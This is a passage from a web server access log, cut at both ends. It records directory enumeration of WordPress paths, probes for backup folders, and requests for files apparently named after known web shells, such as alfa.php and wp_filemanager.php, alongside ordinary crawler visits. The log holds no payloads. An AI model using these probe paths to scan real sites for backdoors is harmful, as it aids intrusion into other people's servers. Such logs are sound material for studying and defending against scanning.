Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:27 -0500] "GET /wp-includes/js/tinymce/themes/inlite/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:27 -0500] "GET /shop/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:26 -0500] "GET /tinyfilemanager HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:26 -0500] "GET /upload/image/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:27 -0500] "GET /wp-includes/Requests/src/Auth/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:26:27 -0500] "GET /admin/editor/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:26:28 -0500] "GET /wp-includes/blocks/block/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:28 -0500] "GET /include/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 194.5.82.85 - - [20/Dec/2025:15:26:29 -0500] "GET /.well-known/pki-validation/ HTTP/1.1" 200 2061 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:29 -0500] "GET /images/stories/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:29 -0500] "GET /wp-admin/css/colors/light/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:30 -0500] "GET /admin/upload/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:30 -0500] "GET /wp-content/plugins/ioxi/ioxi/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:26:30 -0500] "GET /wp-includes/blocks/site-logo/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:30 -0500] "GET /wp-content/themes/classic/inc/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:31 -0500] "GET /wp-includes/js/mediaelement/renderers/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:31 -0500] "GET /wp-content/uploads/2023/03/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:31 -0500] "GET /wp-includes/blocks/calendar/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:32 -0500] "GET /wp-content/plugins/erinyani/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:32 -0500] "GET /wp-includes/js/tinymce/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:33 -0500] "GET /wp-includes/js/thickbox/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:34 -0500] "GET /wp-includes/js/tinymce/langs/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:27 -0500] "GET /local/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:28 -0500] "GET /img/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:28 -0500] "GET /wp-admin/css/colors/sunrise/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:28 -0500] "GET /wp-includes/js/jquery/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:26:29 -0500] "GET /Site/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:29 -0500] "GET /wp-includes/js/imgareaselect/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:31 -0500] "GET /system/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:31 -0500] "GET /wp-content/languages/themes/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:32 -0500] "GET /.well-knownold/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:32 -0500] "GET /wp-content/mu-plugins/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:26:32 -0500] "GET /wp-includes/Requests/Utility/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:33 -0500] "GET /wp-content/plugins/seoplugins/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:33 -0500] "GET /wp-includes/js/tinymce/skins/lightgray/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:26:33 -0500] "GET /wp-includes/blocks/post-author/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:33 -0500] "GET /wp-content/uploads/2023/11/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:26:34 -0500] "GET /wp-includes/SimplePie/Content/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:34 -0500] "GET /docs/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:26:34 -0500] "GET /wp-includes/random_compat/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:35 -0500] "GET /wp-includes/js/tinymce/utils/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:26:34 -0500] "GET /wp-includes/Requests/Response/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:35 -0500] "GET /backup/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:35 -0500] "GET /wp-includes/js/jcrop/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:36 -0500] "GET /components/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:36 -0500] "GET /wp-includes/js/dist/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:26:36 -0500] "GET /wp-includes/blocks/group/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:38 -0500] "GET /wp-includes/blocks/latest-comments/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:38 -0500] "GET /wp-content/plugins/xt/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:26:38 -0500] "GET /wp-includes/Requests/Transport/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:39 -0500] "GET /.tmb/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 46.105.46.43 - - [20/Dec/2025:15:26:43 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)" 13.84.156.6 - - [20/Dec/2025:15:26:50 -0500] "HEAD /test HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:28:33 -0500] "HEAD /TEST HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:31:58 -0500] "HEAD /www HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:35 -0500] "GET /wp-includes/blocks/freeform/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:35 -0500] "GET /wp-includes/js/dist/development/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:26:36 -0500] "GET /aspera/faspex/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:26:36 -0500] "GET /wp-includes/css/dist/edit-widgets/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:26:37 -0500] "GET /wp-content/uploads/2022/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:26:37 -0500] "GET /wp-includes/Requests/src/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:37 -0500] "GET /wp-content HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:26:37 -0500] "GET /wp-includes/sodium_compat/namespaced/Core/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:37 -0500] "GET /wp-includes/Requests/Auth/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:38 -0500] "GET /wp-content/fonts/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:38 -0500] "GET /wp-content/uploads/2022/07/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 46.105.46.43 - - [20/Dec/2025:15:26:44 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)" 13.84.156.6 - - [20/Dec/2025:15:27:19 -0500] "HEAD /Test HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:29:40 -0500] "HEAD /demo HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:30:27 -0500] "HEAD /bc HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:32:17 -0500] "HEAD /WWW HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:33:23 -0500] "HEAD /Www HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 216.244.66.236 - - [20/Dec/2025:15:33:38 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:15:33:38 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 13.84.156.6 - - [20/Dec/2025:15:34:46 -0500] "HEAD /2021 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:37:08 -0500] "HEAD /old-site HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:38:11 -0500] "HEAD /bk HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 199.244.88.228 - - [20/Dec/2025:15:39:48 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:40:42 -0500] "HEAD /SHOP HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:42:32 -0500] "HEAD /shop HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:43:34 -0500] "HEAD /bak HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:45:51 -0500] "HEAD /bac HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 196.240.254.243 - - [20/Dec/2025:15:46:08 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0" 13.84.156.6 - - [20/Dec/2025:15:46:45 -0500] "HEAD /sito HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:49:10 -0500] "HEAD /Site HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:50:24 -0500] "HEAD /SITE HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:51:12 -0500] "HEAD /blog HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:36:00 -0500] "HEAD /main HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:38:41 -0500] "HEAD /Backup HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:39:52 -0500] "HEAD /BACKUP HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:41:41 -0500] "HEAD /Shop HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 110.249.201.120 - - [20/Dec/2025:15:42:38 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)" 51.68.107.151 - - [20/Dec/2025:15:44:02 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)" 51.68.107.151 - - [20/Dec/2025:15:44:03 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)" 13.84.156.6 - - [20/Dec/2025:15:44:34 -0500] "HEAD /sitio HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:15:47:54 -0500] "HEAD /site HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 66.249.75.1 - - [20/Dec/2025:15:53:03 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 13.84.156.6 - - [20/Dec/2025:15:53:07 -0500] "HEAD /Blog HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 216.244.66.203 - - [20/Dec/2025:15:53:41 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 24.144.123.43 - - [20/Dec/2025:15:54:51 -0500] "GET /admin/imger/5f520960dd38b.jpg HTTP/1.1" 301 795 "http://taxhelplines.com.pk/admin/imger/5f520960dd38b.jpg" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" 51.68.111.218 - - [20/Dec/2025:16:01:08 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)" 13.84.156.6 - - [20/Dec/2025:15:52:06 -0500] "HEAD /BLOG HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 66.249.75.1 - - [20/Dec/2025:15:53:03 -0500] "GET /taxcal HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 121.229.156.117 - - [20/Dec/2025:16:01:05 -0500] "GET / HTTP/1.1" 301 795 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 51.68.111.218 - - [20/Dec/2025:16:01:07 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)" 68.235.46.117 - - [20/Dec/2025:16:07:56 -0500] "GET / HTTP/1.1" 301 795 "-" "Go-http-client/1.1" 216.244.66.236 - - [20/Dec/2025:16:17:34 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:16:17:34 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 52.169.163.135 - - [20/Dec/2025:16:26:48 -0500] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:50 -0500] "GET /alfa.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:51 -0500] "GET /sx21_1.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:51 -0500] "GET /lite.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:52 -0500] "GET /css/index.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:52 -0500] "GET /minik.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:53 -0500] "GET /icdwb.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:54 -0500] "GET /akp.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:55 -0500] "GET /mek.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:55 -0500] "GET /tll.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:56 -0500] "GET /cwsd.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:59 -0500] "GET /ticket.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:59 -0500] "GET /lufix.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:00 -0500] "GET /s.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:01 -0500] "GET /wp-admin/index.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:01 -0500] "GET /doc.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:03 -0500] "GET /good.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:04 -0500] "GET /pop.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:05 -0500] "GET /gmo.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - 